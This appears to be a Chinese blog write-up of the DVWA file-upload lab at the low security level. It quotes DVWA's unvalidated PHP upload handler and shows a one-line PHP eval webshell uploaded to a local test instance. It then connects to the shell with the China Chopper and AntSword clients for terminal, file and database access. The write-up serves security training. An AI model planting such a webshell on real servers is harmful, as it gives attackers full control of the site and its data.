dvwa上传php文件,DVWA下的文件上传(上)

File Upload(文件上传)漏洞:

由于对用户上传文件的类型、内容没有进行严格的审查,使得攻击者可以通过上传含有执行脚本的木马文件操纵服务器,因此文件上传漏洞带来的危害常常是毁灭性的。

low级别:

if( isset( $_POST[ ‘Upload’ ] ) ) {

// Where are we going to be writing to?

$target_path  = DVWA_WEB_PAGE_TO_ROOT . “hackable/uploads/”;

$target_path .= basename( $_FILES[ ‘uploaded’ ][ ‘name’ ] );

// Can we move the file to the upload folder?

if( !move_uploaded_file( $_FILES[ ‘uploaded’ ][ ‘tmp_name’ ], $target_path ) ) {

// No

echo ‘

Your image was not uploaded.
’;

}

else {

// Yes!

echo “

{$target_path} succesfully uploaded!
”;

}

}

?>

源代码分析:

代码流程:

文件上传文件后,文件直接保存,保存路径为hackable/uploads/,文件上传成功后,返回succesfully。

函数basename():返回路径中的文件名部分函数

move_uploaded_file ( string $filename , string $destination ):将文件移动到指定地址

防御措施:无

测试方法:

本关没有任何保护措施,上传成功后会返回文件路径地址,可直接上传恶意脚本文件进行攻击

269308da2e3aadd456f9e0e85573cfcc.gif

编写一句话木马,注意后缀。

269308da2e3aadd456f9e0e85573cfcc.gif

开始上传一句话

269308da2e3aadd456f9e0e85573cfcc.gif

显示成功上传,可以到这个路径下去验证

269308da2e3aadd456f9e0e85573cfcc.gif

可以看到确实上传成功了,那么我们来试试访问

269308da2e3aadd456f9e0e85573cfcc.gif

可以看到,确实可以访问,状态码为200,之所以一片空白,是因为被访问的文件就是写好的hh.php,本来就没有内容。既然可以访问,就要记好这个路径:http://127.0.0.1/hackable/uploads/hh.php

下一步,上中国菜刀:

269308da2e3aadd456f9e0e85573cfcc.gif

在空白处右键单击,选添加,然后写入hh/php的访问路径,密码就是hh,由“<?php @eval($_POST[‘hh’]);?>“决定的。最后添加上去

269308da2e3aadd456f9e0e85573cfcc.gif

然后选中这天记录,右键单击,选择”文件管理”

269308da2e3aadd456f9e0e85573cfcc.gif

哦豁,有点奇怪咯,没连上?

再试试“虚拟终端”:

269308da2e3aadd456f9e0e85573cfcc.gif

还没连上,最后再试试数据库管理看看(还没死心)

269308da2e3aadd456f9e0e85573cfcc.gif

有毒啊~这个时候一定要头脑清晰

好好想想是哪一步出了错,首先,一句话脚本,就那么简单的一句话,不应该会有问题,再就是访问路径了

可以访问路径也不会有问题的,不用菜刀,直接浏览器是可以访问的,只是被访问的对象本来就没有内容而已。所以,可以排除路径的问题。最后,肯定不是dvwa环境的问题,要是,dvwa有问题,是不可能做到现在这一步的。

那么,真相只有一个!

我有问题。。。

找不出问题是我最大的问题!!!

越是这个时候,心态越不能崩,除了菜刀,还有别的工具可用的,不妨试试,死马当成活马医。

这个工具就是蚁剑

269308da2e3aadd456f9e0e85573cfcc.gif

话不多说,上操作:

269308da2e3aadd456f9e0e85573cfcc.gif

空白处选择添加数据,一样的url,一样的密码,一样的操作

然后对着这条记录右键单击,选择虚拟终端:

269308da2e3aadd456f9e0e85573cfcc.gif

可以看到一些windows系统的信息

然后再看文件管理:

269308da2e3aadd456f9e0e85573cfcc.gif

最后再来看看,数据操作

269308da2e3aadd456f9e0e85573cfcc.gif

说明,我前面的一句话没写错,路径也没弄错,dvwa环境更没错,所以真正的真相就只有一个!

同样,以上的几个操作,更能验证文件上传漏洞的危害,基本可以说攻击者可以为所欲为了,尤其是那种操作权限开放的,人家直接修改你的数据库或者直接删库。

写在最后

今天先到这里,事情有点多,再加上排错去了,所以时间不够用。后面有空继续,专属我自己的dvwa通关手册即将完成。go!go!go!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值